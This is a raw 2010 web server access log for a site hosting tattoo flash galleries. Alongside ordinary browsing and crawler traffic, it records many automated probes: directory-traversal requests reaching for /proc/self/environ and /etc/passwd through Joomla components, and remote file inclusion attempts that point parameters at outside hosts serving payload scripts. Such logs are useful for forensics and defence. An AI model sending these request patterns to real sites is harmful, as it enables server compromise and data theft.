78.41.233.128 - - [26/Jun/2010:23:16:04 -0500] "GET /logs/access_log.1275782400///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
67.247.231.180 - - [26/Jun/2010:23:18:15 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.1" 200 55770 "http://englishpatterns.com/community/240""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"
195.190.166.35 - - [26/Jun/2010:23:19:03 -0500] "GET /logs/access_log.1275868800/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.190.166.35 - - [26/Jun/2010:23:19:03 -0500] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
195.190.166.35 - - [26/Jun/2010:23:19:03 -0500] "GET /logs/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
202.62.103.120 - - [26/Jun/2010:23:19:15 -0500] "GET /logs/access_log.1274572800//functions_mod_user.php?phpbb_root_path=http://chinese.ncue.edu.tw//appserv/AUTHORS.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.834"
202.62.103.120 - - [26/Jun/2010:23:19:15 -0500] "GET //functions_mod_user.php?phpbb_root_path=http://chinese.ncue.edu.tw//appserv/AUTHORS.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
202.62.103.120 - - [26/Jun/2010:23:19:16 -0500] "GET /logs//functions_mod_user.php?phpbb_root_path=http://chinese.ncue.edu.tw//appserv/AUTHORS.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.834"
208.53.147.51 - - [26/Jun/2010:23:20:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [26/Jun/2010:23:20:28 -0500] "GET //index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [26/Jun/2010:23:20:28 -0500] "GET /logs//index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
99.107.207.123 - - [26/Jun/2010:23:20:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:20:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:20:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:20:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:46 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:47 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:47 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:47 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
99.107.207.123 - - [26/Jun/2010:23:21:58 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
85.236.50.166 - - [26/Jun/2010:23:23:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:23:23:41 -0500] "GET //index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:23:23:41 -0500] "GET /logs//index.php?option=com_redshop&view=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.142.75.205 - - [26/Jun/2010:23:25:41 -0500] "GET /logs/access_log.1275264000/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:23:25:41 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:23:25:41 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:23:25:49 -0500] "GET /logs/access_log.1275264000%20/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
207.46.13.143 - - [26/Jun/2010:23:29:40 -0500] "GET /logs/access_log.1262822400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.56.55.217 - - [26/Jun/2010:23:33:57 -0500] "GET //?path%5Bdocroot%5D=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:09 -0500] "GET /logs/access_log.1274572800/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:16 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:16 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:54 -0500] "GET /logs/access_log.1274572800/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:55 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:23:42:56 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.252.241 - - [26/Jun/2010:23:44:35 -0500] "GET /rachel%20study/ HTTP/1.1" 404 297 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.120.159.137 - - [26/Jun/2010:23:46:08 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.20.37.59 - - [26/Jun/2010:23:48:19 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
201.20.37.59 - - [26/Jun/2010:23:50:14 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.64.143.165 - - [26/Jun/2010:23:50:15 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:23:51:15 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:23:51:28 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:23:51:33 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.64.143.165 - - [26/Jun/2010:23:51:41 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:23:51:42 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:53:28 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
188.40.246.135 - - [26/Jun/2010:23:53:28 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.46.199.48 - - [26/Jun/2010:23:55:40 -0500] "GET /logs/access_log.1162166400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.41.132 - - [26/Jun/2010:23:56:41 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:23:56:53 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
63.194.250.181 - - [26/Jun/2010:23:58:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=&q=bert+grimm+tattoo+flash&sourceid=navclient-ff&rlz=1B2GGGL_enUS207US207&ie=UTF-8&aq=0&oq=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:07 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:15 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:16 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:16 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:16 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:18 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:18 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
87.206.204.16 - - [26/Jun/2010:23:58:36 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
63.194.250.181 - - [26/Jun/2010:23:58:37 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:39 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:39 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:58:39 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
87.206.204.16 - - [26/Jun/2010:23:59:01 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
63.194.250.181 - - [26/Jun/2010:23:59:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
